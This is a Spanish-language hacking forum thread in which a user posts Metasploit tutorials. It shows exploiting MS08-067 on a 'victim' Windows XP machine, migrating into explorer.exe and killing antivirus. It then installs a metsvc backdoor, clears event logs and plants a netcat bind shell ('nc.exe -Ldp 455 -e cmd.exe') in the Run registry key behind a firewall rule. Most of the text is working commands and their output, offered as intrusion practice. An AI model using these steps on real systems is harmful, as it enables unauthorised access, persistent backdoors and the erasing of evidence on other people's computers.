Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
Cargando

Autor Tema: METERPRETER EDITADO PARTE I(con video de kid_goth) , II , III, IV y V  (Leído 4073 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado JULY

  • Éste es mi foro! [L6]
  • *****
  • Topic Author
  • Mensajes: 748
  • Inmutable
    • Ver Perfil
                                           1   METERPRETER

tuto 2, 3 , 4 Y 5 abajo

Hola amigos hoy vamos a ver como se obtiene un meterpreter

PC victima

 

Vamos usar el exploit (muy conocido)windows/smb/ms08_067_netapi
y el payload windows/meterpreter/bind_tcp para que nos de el meterpreter en la pc victima

Código: [Seleccionar]
      =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ -- --=[ 815 exploits - 459 auxiliary - 137 post
+ -- --=[ 248 payloads - 27 encoders - 8 nops
       =[ svn r14995 updated -3719 days ago (2012.03.20)

msf > use windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf  exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Spanish
[*] Selected Target: Windows XP SP3 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:1481 -> 192.168.1.101:4444) at 2002-01-13 16:05:53

-0200

meterpreter >

Come se ve se coloca la ip de la victima, la ip de nuestra pc y se configura los puertos o no eso es a eleccion

¿Què es meterpreter?

“Meterpreter” e es una familia de plugins avanzados de los mismos creadores del Metasploit Framework,

que se utiliza sobre sistemas Windows comprometidos y tienen como característica fundamental que todo

es cargado en la memoria del sistema sin crear ningún proceso adicional ni dejar rastro

Ya tenes mos nuestro meterpreter y ahora?

Estos pasos son los que sigo yo pueden haber mejores o distintos, pero despues de leer mucho me parecio que estos pasos son los mejores

Ahora lo que voy hacer es  mostrale los distintos comandos poniendo help

Código: [Seleccionar]
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter >

Pero antes que nada me voy a fijar en que proceso estoy y mudarme a uno mas estable como explorer

Código: [Seleccionar]
meterpreter > getpid
Current pid: 1036
meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                           Path
 ---   ----              ----  -------  ----                           ----
 0     [System Process]
 4     System            x86   0        NT AUTHORITY\SYSTEM
 252   wpabaln.exe       x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\system32\wpabaln.exe
 324   rundll32.exe      x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\system32\rundll32.exe
 360   smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 524   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           

\??\C:\WINDOWS\system32\csrss.exe
 556   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           

\??\C:\WINDOWS\system32\winlogon.exe
 668   services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 680   lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 844   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 944   svchost.exe       x86   0        NT AUTHORITY\Servicio de red   C:\WINDOWS\system32\svchost.exe
 1036 svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1080  explorer.exe      x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\Explorer.EXE
 1216  alg.exe           x86   0        NT AUTHORITY\SERVICIO LOCAL    C:\WINDOWS\System32\alg.exe
 1220  svchost.exe       x86   0        NT AUTHORITY\Servicio de red   C:\WINDOWS\system32\svchost.exe
 1292  svchost.exe       x86   0        NT AUTHORITY\SERVICIO LOCAL    C:\WINDOWS\system32\svchost.exe
 1400  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1512  ctfmon.exe        x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\system32\ctfmon.exe
 1944  metsvc.exe        x86   0        NT AUTHORITY\SYSTEM           

C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exe


meterpreter > migrate 1080
[*] Migrating to 1080...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 1080
meterpreter >
Como se ve estaba en el pid 1036 = svchost.exe
y lo que hice fue pasarme a el pid 1080 = explorer.exe
Comandos usados fueron  getpid ==> para saber en que pid o proceso estoy
migrate ==> para mudarse de proceso

Ahora vamos a ver la parte del firewall y del antivirus

Código: [Seleccionar]
meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*]     Configuración del perfil Dominio:
[*]     -------------------------------------------------------------------
[*]     Modo funcional                                = Habilitar
[*]     Modo de excepción                             = Habilitar
[*]
[*]     Configuración del perfil Estándar (actual):
[*]     -------------------------------------------------------------------
[*]     Modo funcional                                = Deshabilitar
[*]     Modo de excepción                             = Habilitar
[*]
[*]     Configuración del servidor de seguridad Conexión de área local:
[*]     -------------------------------------------------------------------
[*]     Modo funcional                                = Habilitar
[*]
[*] Checking DEP Support Policy...
meterpreter >

Comandos usados:  killav y getcountermeasure
Mas adelante voy a dar una descripcion de los comandos

Lo que voy a intentar ahora es hacer un backdoor para poder entrar a la pc victima cuando quiera sin hacer toda la explotacion de vuelta
Para eso vamos utilizar el comando  metsvc

Código: [Seleccionar]
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\RuaehbuTVStIsh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
Cannot create service (0x00000431)

meterpreter >

Como se ve se subio a la pc victima metsvc-server.exe y metsvc.exe

Vamos a reniciar la pc victima para entrar por el backdoor

Código: [Seleccionar]
meterpreter > reboot
Rebooting...

Ahora vamos a entrar por el backdoor que hemos creado

Código: [Seleccionar]
msf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf  exploit(handler) > exploit
[*] Started bind handler

[*] Starting the payload handler...
[*] Meterpreter session 2 opened (192.168.1.100:1576 -> 192.168.1.101:31337) at
2002-01-13 16:30:32 -0200

meterpreter >

Como se ve en el codigo  hemos usado use exploit/multi/handler y  set payload windows/metsvc_bind_tcp

Código: [Seleccionar]
meterpreter > getpid
Current pid: 1864
meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                           Path
 ---   ----               ----  -------  ----                           ----
 0     [System Process]
 4     System             x86   0        NT AUTHORITY\SYSTEM
 356   smss.exe           x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 476   explorer.exe       x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\Explorer.EXE
 512   csrss.exe          x86   0        NT AUTHORITY\SYSTEM           

\??\C:\WINDOWS\system32\csrss.exe
 552   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM           

\??\C:\WINDOWS\system32\winlogon.exe
 664   services.exe       x86   0        NT AUTHORITY\SYSTEM           

C:\WINDOWS\system32\services.exe
 676   lsass.exe          x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 840   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 948   svchost.exe        x86   0        NT AUTHORITY\Servicio de red   C:\WINDOWS\system32\svchost.exe
 1024  alg.exe            x86   0        NT AUTHORITY\SERVICIO LOCAL    C:\WINDOWS\System32\alg.exe
 1044  svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1124  svchost.exe        x86   0        NT AUTHORITY\Servicio de red   C:\WINDOWS\system32\svchost.exe
 1180  ctfmon.exe         x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\system32\ctfmon.exe
 1288  svchost.exe        x86   0        NT AUTHORITY\SERVICIO LOCAL    C:\WINDOWS\system32\svchost.exe
 1420  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1724  wuauclt.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wuauclt.exe
 1864  metsvc-server.exe  x86   0        NT AUTHORITY\SYSTEM           

C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc-server.exe
 1964  metsvc.exe         x86   0        NT AUTHORITY\SYSTEM           

C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exe
 2032  wpabaln.exe        x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\system32\wpabaln.exe

meterpreter >

Estamos corriendo por el proceso del backdoor 1864  metsvc-server.exe

Para borrar las huellas usamos el comando clearev

Código: [Seleccionar]
meterpreter > clearev
[*] Wiping 86 records from Application...
[*] Wiping 144 records from System...
[*] Wiping 0 records from Security...
meterpreter >
ya podemos estar un poco mas tranquilo y disfrutar de nuestro meterpreter
pongo algunos coamndos para que vean

Código: [Seleccionar]
meterpreter > shell
Process 452 created.
Channel 1 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrador>exit
meterpreter >

Código: [Seleccionar]
meterpreter > sysinfo
Computer        : HACKXCRA-7848AA
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : es_ES
Meterpreter     : x86/win32
meterpreter >

Bueno en el proximo tuto vamos a ver las descripciones de los comandos usados tambien hacer un backdoor con netcat y otras cositas muy interesantes

Espero que se entienda cualquier duda estoy a sus ordenes je je je

saludosssss

Hola amigo kid_goth ha hecho los videos de estas practicas para que entiendan mejor
Este es el primero

<a href="http://www.youtube.com/watch?v=BYVIgLs2Zgg" target="_blank">http://www.youtube.com/watch?v=BYVIgLs2Zgg</a>

gracias kid

EDITO: tuto 2, 3 , 4 Y 5 abajo 
« última modificación: Abril 18, 2012, 04:26:59 pm por JULY »

Desconectado ruben_linux

  • Parte de la comunidad [L3]
  • ***
  • Mensajes: 235
    • Ver Perfil
    • AreaLinux
Re:METASPLOIT METERPRETER
« Respuesta #1 en: Marzo 27, 2012, 07:37:48 pm »
muy bueno, me gusta. También podías comentar "VNC" es muy vistoso y gracioso.

 ;)

Desconectado JULY

  • Éste es mi foro! [L6]
  • *****
  • Topic Author
  • Mensajes: 748
  • Inmutable
    • Ver Perfil
Re:METASPLOIT METERPRETER
« Respuesta #2 en: Marzo 27, 2012, 07:58:16 pm »
Claro amigo metasploit es un mundo VNC ya esta hecho por zon3r
ademas de ser mas sinple :)
Mas adelante viene mas complicado y mas lindo jejejeje
saludoss

Desconectado Sasuke

  • Parte de la comunidad [L3]
  • ***
  • Mensajes: 177
    • Ver Perfil
Re:METASPLOIT METERPRETER
« Respuesta #3 en: Marzo 27, 2012, 09:22:57 pm »
Muy bueno July no me esperaba menos de ti  ;D
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.
-Albert Einstein

Desconectado kid_goth

  • EX-STAFF
  • ***
  • Mensajes: 1369
  • El Conocimiento se Limita Cuando dices NO PUEDO
    • Ver Perfil
    • BlogStudiantes
Re:METASPLOIT METERPRETER
« Respuesta #4 en: Marzo 27, 2012, 10:52:15 pm »
seeee lo sabia xD lo sabia.... gracias july me gusta cada vez mas esto de MSF xD... saludos bro
Recuerda que aunque tu vida haya sido dificil o facil en la muerte encontraras que para todos es igual...
(Justicia Divina)

Desconectado Tarmo

  • Conociendo la comunidad [L2]
  • **
  • Mensajes: 148
  • Ya se uniran los puntos
    • Ver Perfil
Re:METASPLOIT METERPRETER
« Respuesta #5 en: Marzo 27, 2012, 10:57:22 pm »
Esta muy bueno aunque me gustaria ver alguna intrusión en vez de windows xp... al 7



Desconectado JULY

  • Éste es mi foro! [L6]
  • *****
  • Topic Author
  • Mensajes: 748
  • Inmutable
    • Ver Perfil
Re:METASPLOIT METERPRETER
« Respuesta #6 en: Marzo 27, 2012, 11:00:14 pm »
Esta muy bueno aunque me gustaria ver alguna intrusión en vez de windows xp... al 7

Como no amigo dejame terminar con estas tutos en xp pack 3 y despues vamos con el wind 7

saludosssss

Desconectado r@mbyte

  • Parte de la comunidad [L3]
  • ***
  • Mensajes: 235
  • vive cada dia como si fuera el ultimo
    • Ver Perfil
Re:METASPLOIT METERPRETER
« Respuesta #7 en: Marzo 27, 2012, 11:13:35 pm »
gran tuto july  ;) poco a poco me voy metiendo a este mundillo de los exploits xd
salu2

Conectado Facu

  • Administrador
  • *****
  • Mensajes: 1533
  • La piratería es un crimen. No ataque barcos.
    • Ver Perfil
Re:METASPLOIT METERPRETER
« Respuesta #8 en: Marzo 27, 2012, 11:50:02 pm »
Gracias July, despues lo voy a leer con mas tiempo, ahora intento ponerme al día con el foro XD
El guerrero de la luz a veces actúa como el agua, y
fuye entre los obstáculos que encuentra. En ciertos
momentos, resistir signifca ser destruido; entonces,
él se adapta a las circunstancias.
En esto reside la fuerza del agua. Jamás puede ser
quebrada por un martillo, ni herida por un cuchillo. La
más poderosa espada del mundo es incapaz de dejar una
cicatriz sobre su superfcie.
 Paulo Coelho

Desconectado JULY

  • Éste es mi foro! [L6]
  • *****
  • Topic Author
  • Mensajes: 748
  • Inmutable
    • Ver Perfil
Re:METASPLOIT METERPRETER
« Respuesta #9 en: Marzo 28, 2012, 04:16:20 pm »

                                          2  NETCAT(BACKDOOR)

Hola amigos ahora vamos hacer la 2da parte del tuto
Vamos hacer un backdoor con netcat

Ya tenemos el METERPRETER y ya se hizo los pasos del anterior tuto

Ahora vamos a ponerle nuestro netcat a la maquina victima

upload C:\\nc.exe C:\\windows\\system32

Código: [Seleccionar]
meterpreter > upload C:\\nc.exe C:\\windows\\system32
[*] uploading  : C:\nc.exe -> C:\windows\system32
[*] uploaded   : C:\nc.exe -> C:\windows\system32\nc.exe
meterpreter >

Como se ve se subio el archivo con exito
Ahora viene lo lindo, vamos al registro de windows(regedit)
para lograr que cada vez que se inicie la maquina victima se ejecute nuestro netcat

Código: [Seleccionar]
meterpreter >reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (1):

        nc

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe



Muy bien ya esta agregado nuestro netcat al registro
Ahora vamos a ver la parte del firewall

Código: [Seleccionar]
meterpreter > execute -f cmd -i
Process 1600 created.
Channel 2 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show opmode
netsh firewall show opmode

Configuración del perfil Dominio:
-------------------------------------------------------------------
Modo funcional                                = Habilitar
Modo de excepción                             = Habilitar

Configuración del perfil Estándar (actual):
-------------------------------------------------------------------
Modo funcional                                = Deshabilitar
Modo de excepción                             = Habilitar

Configuración del servidor de seguridad Conexión de área local:
-------------------------------------------------------------------
Modo funcional                                = Habilitar


Lo que se hizo fue llamar a una shell de la pc victima( execute -f cmd -i) y despues ponemos este comando netsh firewall show opmode

Abrimos el puerto 445 en el firewall, y comprobamos si se creo bien a regla

Código: [Seleccionar]
C:\WINDOWS\system32>netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
Ok.

Código: [Seleccionar]
C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
455    TCP       Enable   Service Firewall
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

C:\WINDOWS\system32>
Bueno ahora a reiniciar la pc victima primero salimos de la shell con exit y
en meterpreter ponemos el comando reboot
En muestra pc en cmd nos vamos a conectar con la maquina victima

Código: [Seleccionar]
nc -v 192.168.1.101 455

Y se conectara sin problema



En la pc victima si vemos sus procesos veremos el nc.exe pid 800 ejecutandose

Código: [Seleccionar]
meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                           Path
 ---   ----               ----  -------  ----                           ----
 0     [System Process]
 4     System             x86   0        NT AUTHORITY\SYSTEM
 256   explorer.exe       x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\Explorer.EXE
 360   smss.exe           x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 516   csrss.exe          x86   0        NT AUTHORITY\SYSTEM           

\??\C:\WINDOWS\system32\csrss.exe
 548   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM           

\??\C:\WINDOWS\system32\winlogon.exe
 620   alg.exe            x86   0        NT AUTHORITY\SERVICIO LOCAL    C:\WINDOWS\System32\alg.exe
 660   services.exe       x86   0        NT AUTHORITY\SYSTEM           

C:\WINDOWS\system32\services.exe
 672   lsass.exe          x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 800   nc.exe             x86   0        HACKXCRA-7848AA\Administrador  C:\windows\system32\nc.exe
 844   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 864   ctfmon.exe         x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\system32\ctfmon.exe
 928   svchost.exe        x86   0        NT AUTHORITY\Servicio de red   C:\WINDOWS\system32\svchost.exe
 1040  svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1236  svchost.exe        x86   0        NT AUTHORITY\Servicio de red   C:\WINDOWS\system32\svchost.exe
 1288  svchost.exe        x86   0        NT AUTHORITY\SERVICIO LOCAL    C:\WINDOWS\system32\svchost.exe
 1416  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1712  wuauclt.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wuauclt.exe
 1784  cmd.exe            x86   0        HACKXCRA-7848AA\Administrador  C:\windows\system32\cmd.exe
 1848  metsvc.exe         x86   0        NT AUTHORITY\SYSTEM           

C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exe
 1920  metsvc-server.exe  x86   0        NT AUTHORITY\SYSTEM           

C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc-server.exe
 1940  wpabaln.exe        x86   0        HACKXCRA-7848AA\Administrador  C:\WINDOWS\system32\wpabaln.exe

meterpreter >

Hay muchos metodos para hacer esto, tambien con conexion inversa
osea nosotros estamos a la ecucha(listen) y la pc victima se nos conecta a nosotros
esto es bueno para evitar el firewall
Ademas prefiero un bifrost o spynet porque en el reg de windows lo hace solo entre otras cosas  ;)
Pero esta practica nos enseña hacer las cosas a mano tanto para el regedit como para el firewall

Dentro de poco se viene el tuto 3

saludos



« última modificación: Marzo 31, 2012, 02:09:42 pm por JULY »